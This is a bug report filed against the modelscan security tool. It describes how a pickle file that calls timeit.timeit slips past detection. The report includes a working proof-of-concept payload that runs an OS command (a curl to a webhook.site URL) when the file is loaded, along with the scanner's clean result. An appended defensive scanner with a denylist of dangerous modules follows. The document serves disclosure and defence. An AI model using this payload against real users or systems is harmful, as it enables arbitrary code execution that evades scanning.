[BUG] Missing detection when calling built-in python library function timeit.timeit() #272

@SeaW1nd

Describe the bug
Using the timeit.timeit() function, which is a built-in Python library function to execute remote pickle file.

To Reproduce
Steps to reproduce the behavior:

  1. The attacker crafted a malicious pickle file using the built-in Python library function timeit.timeit()

    import pickle
    import timeit

    class Payload(object):
        # __reduce__ makes pickle call timeit.timeit(stmt, setup) on load
        def __reduce__(self):
            return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')

    def create_payload():
        with open('payload.pickle', 'wb') as f:
            pickle.dump(Payload(), f)

    create_payload()

     Then the attacker will send this pickle file to the victim's computer, and maybe the victim would load this pickle using pickle.load()
  2. The victim will use the modelscan library to check whether the received pickle file is malicious or not

modelscan -p payload.pickle
No settings file detected at /mnt/e/Stuff or sth like that/picklescan/modelscan-settings.toml. Using defaults.

Scanning /mnt/e/Stuff or sth like that/picklescan/payload.pickle using modelscan.scanners.PickleUnsafeOpScan model scan

--- Summary ---

 No issues found!
  3. Believing that this pickle file is safe using modelscan, the victim then loads this pickle file, which will trigger the timeit.timeit command to execute OS commands (in my example, it was a curl command)

    import pickle

    def load_payload():
        # Unpickling runs the callable returned by __reduce__
        with open('payload.pickle', 'rb') as f:
            pickle.load(f)

    load_payload()

Expected behavior
If the victim loads this malicious pickle file without it being detected by modelscan, it will execute arbitrary OS commands such as a curl command.

Environment (please complete the following information):

  • OS : Ubuntu 22.04
  • Modelscan Version: 0.8.5
  • Describe the model serialization format that triggered this error (if applicable): pickle

Additional context
I suggest putting the timeit library into the unsafe global functions.
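
The kind of check this report asks for, as an added example (not modelscan's code and not from the issue author): it reads the pickle opcodes with pickletools, without loading the file, and flags imports from a denylist that includes timeit. The denylist, the function names and the sample pickle with harmless arguments are constructed for illustration.

```python
import pickle
import pickletools
import timeit

# Constructed denylist for illustration only; not modelscan's actual settings.
UNSAFE_MODULES = {"timeit", "os", "posix", "nt", "subprocess"}
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}

def find_globals(data):
    """List (module, name) imports in a pickle by reading opcodes, never loading it."""
    found, memo, pushed = [], {}, [None, None]  # pushed: known strings, None = unknown
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "MEMOIZE":
            memo[len(memo)] = pushed[-1]
        elif op.name in PUT_OPS:
            memo[arg] = pushed[-1]
        elif op.name in GET_OPS:
            pushed.append(memo.get(arg))  # a repeated string may come back via the memo
        elif op.name in STRING_OPS:
            pushed.append(arg)
        elif op.name in ("GLOBAL", "INST"):
            found.append(tuple(arg.split(" ", 1)))  # protocols 0-3: "module name"
            pushed.append(None)
        elif op.name == "STACK_GLOBAL":
            found.append((pushed[-2], pushed[-1]))  # protocol 4+: module below name
            pushed.append(None)
        else:
            pushed.append(None)
    return found

def scan(data):
    """Flag denylisted modules; an unresolved import is flagged too (fail closed)."""
    return [(m, n) for m, n in find_globals(data)
            if m is None or n is None or m.split(".")[0] in UNSAFE_MODULES]

class Sample:
    # Constructed sample: same shape as the issue's payload, harmless arguments.
    def __reduce__(self):
        return timeit.timeit, ("pass", "pass")

def sample_pickle(protocol):
    return pickle.dumps(Sample(), protocol=protocol)  # dumps() does not call timeit

if __name__ == "__main__":
    for proto in (2, 4):
        print(proto, scan(sample_pickle(proto)))
    print("benign", scan(pickle.dumps({"weights": [1.0, 2.0]})))
```

A denylist only catches the callables it names, which is the gap this report describes; an allowlist of expected globals fails closed for anything new.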
